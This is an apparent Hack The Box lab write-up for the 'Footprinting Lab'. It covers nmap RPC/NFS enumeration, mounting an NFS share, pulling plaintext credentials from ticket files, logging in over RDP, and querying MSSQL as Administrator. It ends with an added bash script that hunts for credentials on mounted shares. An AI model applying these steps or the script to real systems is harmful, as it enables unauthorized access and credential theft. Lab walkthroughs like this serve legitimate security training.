HTB Footprinting Lab (medium) write-up

thesw0rd

This write-up details the steps taken to compromise the medium-level "Footprinting Lab" machine on HTB.

  1. Nmap Fun: First, a regular nmap scan of 10.129.202.41 showed a bunch of open ports, including RPC (the portmapper on 111), SMB, RDP (that's remote desktop!) and NFS.

  2. RPC & NFS Deep Dive: Then we dug a bit deeper into the RPC and NFS services (the script glob is quoted so the shell doesn't expand it against local files):

     $ sudo nmap 10.129.202.41 -p111 --script rpcinfo   # list the RPC programs registered with the portmapper
     $ sudo nmap 10.129.202.41 --script "nfs*" -vv     # runs every nfs-* script (exports, listing, statfs)
    

    Turns out there's a /TechSupport NFS share, but it's pretty locked down: read-only, basically.

  3. Mounting the Share: Read-only is all we need, so we mounted that bad boy on our local machine with

     $ sudo mkdir -p /mnt/nfs
     $ sudo mount -t nfs 10.129.202.41:/TechSupport /mnt/nfs
    
  4. File Hunting: Once it was mounted, we hopped into /mnt/nfs and used ls -a to see what was there. We found a bunch of ticket*.txt files, many of them empty.

  5. Finding the Goods: We looped through the ticket files, skipping the empty ones (-s tests for a non-empty file), with

     for f in ticket*.txt; do [ -s "$f" ] && echo "[+] $f" && cat "$f" && echo; done
    

    Bingo! One of them, ticket4238791283782.txt, contained an SMTP configuration with the username "alex" and the password "lol123!mD". Sweet!

  6. RDP Login: With those new creds (alex and lol123!mD), we tried RDP and it worked! The password goes in single quotes: in an interactive bash shell the ! triggers history expansion, and inside double quotes a backslash before it is kept as part of the word, so "lol123\!mD" would send the wrong password.

     xfreerdp3 /u:alex /p:'lol123!mD' /v:10.129.202.41
    

  7. Admin Creds on RDP: Inside the RDP session, we found a file at C:\Users\alex\debshare\important.txt. This file had the real jackpot: what looked like database admin credentials, sa:87NS1@slls93.

  8. MSSQL for the Win: We initially tried to log into MSSQL with the SQL login sa and the password 87NS1@slls93, but it wasn't working. After checking a hint from HTB that said "Every Windows system has an administrator account", we realized our mistake: the password belongs to the local Administrator account, not to sa. Launching the SQL client as Administrator with 87NS1@slls93 as the password worked, and from there it's plain T-SQL:

     USE accounts;                                  -- switch to the target database
     GO
     SELECT * FROM INFORMATION_SCHEMA.TABLES;       -- enumerate the tables it contains
     SELECT * FROM dbo.devsacc WHERE name='HTB';    -- pull the row we are after
    

    We got it!
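Steps 3 to 5 above are a manual version of a task that comes up on every readable share: find the credentials hiding in a pile of ticket and config files. The following bash script is an added example, not code from the original write-up. It replaces the cat-everything loop with a keyword search that skips empty and binary files, and it builds a constructed stand-in for the mounted share so it runs offline; the mount point, the file contents and the keyword list are all assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the original write-up: credential hunting on a
# mounted share. Instead of cat-ing every ticket*.txt by hand, walk the mount,
# skip empty and binary files, and print only lines that look like credentials.
# The mount point (/mnt/nfs) and the keyword list are assumptions.

# hunt_creds DIR
# Prints "path:line:text" for every credential-looking line under DIR.
# Exit status follows grep: 0 if anything matched, 1 if nothing did.
hunt_creds() {
    local dir="$1"
    # Keys that typically sit right before a secret in tickets, configs and scripts.
    local pattern='(pass(word|wd)?|pwd|user(name)?|login|secret|token|smtp)[[:space:]]*[:=]'
    # ! -empty drops the zero-byte tickets; grep -I skips binaries; -n/-H give
    # line numbers and file names; {} + batches many files into few grep calls.
    find "$dir" -type f ! -empty -exec grep -InHiE "$pattern" {} + 2>/dev/null
}

# make_sample_share
# Builds a constructed stand-in for the NFS mount so the example runs offline.
# The ticket contents are made up; only the layout mirrors the lab share.
make_sample_share() {
    local share
    share="$(mktemp -d)"
    printf 'SMTP config for helpdesk relay\nuser: alex\npassword: lol123!mD\n' \
        > "$share/ticket1001.txt"
    : > "$share/ticket1002.txt"                        # empty: skipped by ! -empty
    printf 'Printer on floor 2 jammed again.\n' > "$share/ticket1003.txt"   # no creds
    printf 'password: fake\000\000binary blob' > "$share/ticket1004.bin"    # binary: skipped by -I
    printf '%s' "$share"
}

# Stand-alone run against the constructed share; swap in /mnt/nfs for the real one.
hunt_creds "$(make_sample_share)"
```

On the constructed share this prints only the two lines from ticket1001.txt (the user and password lines); the empty ticket, the unrelated ticket and the binary file produce nothing. Pointing hunt_creds at /mnt/nfs does the same over the real mount, and because it prints file and line number you can go straight to the interesting ticket instead of scrolling through all of them.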
